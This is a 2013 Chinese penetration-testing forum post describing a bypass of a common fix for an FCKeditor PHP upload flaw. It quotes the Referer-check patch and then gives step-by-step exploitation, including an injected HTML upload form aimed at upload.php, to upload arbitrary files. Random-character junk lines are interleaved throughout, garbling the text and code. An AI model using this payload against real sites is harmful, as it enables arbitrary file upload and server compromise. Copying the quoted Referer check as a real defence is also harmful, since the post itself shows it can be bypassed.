中国网络渗透测试联盟
标题:
fckeditor 漏洞修复后的二次利用
[打印本页]
作者:
admin
时间:
2013-1-11 21:12
标题:
fckeditor 漏洞修复后的二次利用
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
7 F" i+ |$ r7 c( [
网上给出的修复方案是
+ n( ?8 h, Q3 w2 a* N" K& U: T
修复方法,删除FCK编辑器用其他的编辑器
7 Q3 A$ _- n) f4 D6 x2 K. e! ^
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
/ j7 \/ z# e" M- z* P* M% ]. D* l
在
. }4 w: Y8 z" x, |. P4 t* ^. @
require(‘config.php’);
- |. z8 W, }1 J& K& J
require(‘util.php’);
/ H1 H5 W" Z' {0 Q) e, I
的下面添加以下代码—————————–
, h: X6 y' }0 ~9 i
//防止外部提交
9 c: ]' k& \( l2 H
function outsidepost()
{# F5 e5 K0 l
{
/ M5 e7 h# t2 H% _, q9 q7 @9 W
$servername=$_SERVER['SERVER_NAME'];
2 x9 `; d9 A& K0 v' H
$sub_from=@$_SERVER['HTTP_REFERER'];
4 I2 T. {, V4 Q6 A+ ?
$sub_len=strlen($servername);
- W3 I, c2 k/ ~8 A- h
$checkfrom=substr($sub_from,7,$sub_len);
, u1 ~/ M! I* ^1 N/ D
if($checkfrom!=$servername){
" Y' A1 c0 t- h% v. ~' P
echo(“you don’t outsidepost!”);
( P; y0 E4 N. c# c% b1 k# ?( u
exit;
8 n c9 |+ y/ t6 a8 @' y! i
}
6 l( }8 N. y( y, V
}
4 ^0 G8 l8 t2 _5 z$ }& L) v
outsidepost();
4 n( @: I y; A
防止外部提交,但是没有防止内部提交,
1 F9 s! h0 X/ w7 p
利用方法:
6 V( U C( n! D# \
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
% B* Z# c- b7 Y( R
2,在Current Folder 框输入
* J+ L9 L3 @; B" e8 P
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
8 q$ n( y& ?# Y, r- T1 {
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
2 T4 ?6 Q7 `( A
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2